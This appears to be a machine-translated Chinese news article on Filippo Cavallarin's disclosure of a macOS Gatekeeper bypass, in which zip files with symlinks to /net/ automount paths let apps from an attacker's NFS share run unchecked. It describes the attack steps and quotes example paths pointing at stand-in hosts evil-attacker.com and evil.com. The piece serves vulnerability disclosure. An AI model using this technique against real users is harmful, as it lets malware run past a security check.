安全研究员菲利普卡瓦拉林(Filippo Cavallarin)披露了他所说的绕过macOS看门人安全功能的方法。截至上周发布的Mac OS版本10.14.5,苹果仍未解决旁路问题。
Gatekeeper是一个macOS安全工具,可以在下载后立即验证应用程序。这可以防止未经用户同意的应用程序。当用户从Mac App Store之外下载应用程序时,Gatekeeper用于检查代码是否已被苹果公司签名。如果代码没有被签名,未经用户许可,应用程序不能被打开。
然而,卡瓦拉林在自己的博客上写道,看门人的功能完全可以被绕过。在当前实施中,Gatekeeper将外部驱动器和网络共享视为“安全的地方”。这意味着它允许这些位置中包含的任何应用程序运行,而不必再次检查代码。他继续解释说,用户可以“很容易地”欺骗安装网络共享驱动器,然后这个文件夹中的任何东西都可以通过Gatekeeper。
安全研究员解释道:
第一个合法功能是automount(又名autofs),它允许用户仅通过访问“特殊”路径(在本例中,任何以“/net/”开头的路径)来自动挂载网络共享。
例如,“ls/net/evil-attacker.com/sharedfolder/”将使操作系统使用NFS来读取远程主机(evil-attacker.com)上“shared folder”的内容。
第二个合法功能是zip存档可以包含指向任意位置的符号链接(包括automount enpoints),MacOS上负责解压zip文件的软件在创建之前不会对符号链接进行任何检查。
这是它如何工作的一个例子:
为了更好地理解这种利用是如何工作的,让我们考虑下面的场景:攻击者制作一个zip文件,其中包含一个到她/他控制的automount端点的符号链接(来自documents-/net/evil.com/documents ),并将它发送给受害者。
受害者下载恶意文件,提取并跟踪符号链接。
现在,受害者处于一个由攻击者控制但被网守信任的位置,因此攻击者控制的任何可执行文件都可以在没有任何警告的情况下运行。寻路器的设计(隐藏。app扩展和标题栏的完整路径)使得这项技术非常有效,并且很难被发现。
卡瓦拉林表示,他在2月22日通知了苹果这个漏洞,该公司应该会在上周发布macOS 10.14.5时解决这个问题。然而,截至该版本,该漏洞仍未得到解决,卡瓦拉林表示,苹果已经停止回复他的邮件。他正在推广这个缺陷,因为他给了苹果90天的窗口期。
标签:
免责声明:本文由用户上传,如有侵权请联系删除!